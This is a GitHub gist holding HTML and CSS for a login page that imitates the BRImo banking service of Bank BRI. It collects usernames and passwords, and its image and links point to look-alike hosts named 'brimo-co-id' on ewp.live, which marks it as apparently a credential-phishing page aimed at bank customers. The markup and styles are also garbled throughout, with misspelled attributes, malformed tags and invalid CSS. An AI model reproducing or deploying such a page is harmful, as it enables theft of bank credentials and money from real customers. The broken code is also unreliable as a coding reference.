Skip to content

Instantly share code, notes, and snippets.

@BANKBRimo
Created October 10, 2022 11:27
Show Gist options
  • Select an option

  • Save BANKBRimo/37fa9484bbc32ca29ce814c069f08a8b to your computer and use it in GitHub Desktop.

Select an option

Save BANKBRimo/37fa9484bbc32ca29ce814c069f08a8b to your computer and use it in GitHub Desktop.
BRimoBRi/login/
<!DOCTYPE html>
<html lang="en">
<meta charset="utf-8">
<meta name="viewport"
content="width=device-width, initial=scale-1.0">
<link=styless.css">
<rel="styless.css">
<body>
<figure="wp-img-width-full-size">
<img
src="https://brimocoid-b7f4eb.ingress-florina.ewp.live/wp-content/uploads/2022/08/IMG_20220827_001027.jpg" alt="" class="wp-image-8" width="360" height="349"/>
<form action"/action_page.php"
menthod="post">
<div class="container">
<label for="uname"><b></b></label>
<input type="text" placeholder="👤 UserName :" name="uname" required=">
<label for="psw">
<input type="password" placeholder="🔒 Password :" name="password" "required">
</div>
<div class="container" style="background-color:f1f1f1">
<span class="psw">Lupa <a href="https://brimo-co-id-b7f4eb.ingress-comporellon.ewp.live/34-2/">Username/Password?</a></span>
<button type="button" class="link"><a href="https://brimo-co-id-b7f4eb.ingress-comporellon.ewp.live/14-2/">LOGIN</a></button><a href="https://brimo-co-id-b7f4eb.ingress-comporellon.ewp.live/14-2/">
</a>
</div>
</body>
</html>
<style>
body {font-family: Areal, Helvetica, sans-serif;}
/* Full width input field */
input[type=text], input[type=password]
{
width: 90%;
padding: 18px 23px;
margin: 0px 6;
display: inline-block;
border-radius: 8px;
border: 1px solid #ccc;
box-sizing: border-box;
font-size: 24px;
}
/* Set a style for all button */
button {
background-color: DodgerBlue;
color: white;
padding: 20px 18px;
margin: 15px 0;
border: none;
border-radius: 8px;
cursor: pointer;
width: 90%;
}
button:hover {
opacity: 0,8;
}
content {
items-align: center;
}
/* Extra style for the cancel button */
.cancelbtn {
width: auto;
padding: 16px 18px;
background-color: DodgerBlue;
}
/* Center the image and position the close button */
.imgcontainer {
text-align: center;
margin: 24px 0 12px 0;
position: relative;
}
span.psw {
float: right;
padding-top: 16px;
}
/* The modal (background) */
.modal {
display: none;
/* Hidden by default */
Position: fixed;
/* Stay in place */
z-index: 1;
/* Sit on top */
left: 0;
top: 0;
width: 100%;
/* Full width */
height: 100%;
/* Full height */
overflow: auto;
/* Enable scroll if needed */
background-color: rgb(0,0,0);
/* Fallback color */
background-color: rgb(0,0,0,0,4);
/* Black w/ opacity */
padding-top: 60px;
}
/* Modal content/content_page.php*/
.modal-content {
background-color: #fefefe;
margin: 5% auto 15% auto;
/* 5% form the top, 15% form the bottom and centered */
border: 1px solid #888;
width: 10%;
/* Could be more or less, depending on screen size */
}
position: absolute;
right: 25px;
top: 0;
color: #000;
font-size: 35px;
font-weight: blod;
}
.close:hover,
.close:pocus {
color: (0);
cursor: pointer;
}
/* Change style for span and cancel button on extra small screens */
@media screen and (max-width: 300px) {
span.psw {
display: block;
float: none;
}
<ul>
</style>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment